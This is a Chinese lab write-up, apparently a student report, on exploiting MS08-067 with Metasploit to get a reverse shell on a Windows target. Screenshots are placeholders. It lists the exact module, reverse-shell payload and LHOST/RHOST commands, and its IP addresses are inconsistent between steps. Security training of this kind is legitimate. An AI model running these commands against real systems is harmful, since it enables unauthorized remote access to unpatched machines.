实验目的:使用Metaspoit攻击MS08-067,提交正确得到远程Shell过程的截图(不少于5张)

靶机:192.168.11.231

windows攻击实验 随笔 第1张

攻击机:192.168.11.131

windows攻击实验 随笔 第2张

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

实验步骤:

1.首先攻击机和靶机互ping,在kali终端开启msfconsole

windows攻击实验 随笔 第3张

windows攻击实验 随笔 第4张

2.查找是否存在ms08_067漏洞,查看返回信息,会显示出找到的渗透模块

windows攻击实验 随笔 第5张

3.输入命令use exploit/windows/smb/ms08_067_netapi,进入利用该漏洞模块。接下来可输入一些命令来显示一些信息,如:

输入show payloads会显示出有效的攻击载荷,比如shell_reverse_tcp

windows攻击实验 随笔 第6张

使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷

windows攻击实验 随笔 第7张

输入show targets会显示出可以被攻击的靶机的操作系统型号

windows攻击实验 随笔 第8张

4.输入show options显示我们需要在攻击前需要设置的数据

windows攻击实验 随笔 第9张

5.设置攻击机和靶机地址,并使用命令show options再次查看payload状态

输入命令set LHOST + 攻击机IP,即set LHOST 192.168.92.131;
输入命令set RHOST + 靶机IP,即set RHOST 192.168.92.231;

windows攻击实验 随笔 第10张

6.输入命令exploit开始攻击,下图为正常攻击成功结果

windows攻击实验 随笔 第11张

7.在攻击机和靶机中分别查看IP地址,输入ipconfig/all,发现结果一致

windows攻击实验 随笔 第12张
windows攻击实验 随笔 第13张

8.输入“netstat -a”命令,可以查看靶机开启了哪些端口

windows攻击实验 随笔 第14张

9.输入“netstat -n”命令, 查看靶机端口的网络连接情况

windows攻击实验 随笔 第15张

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄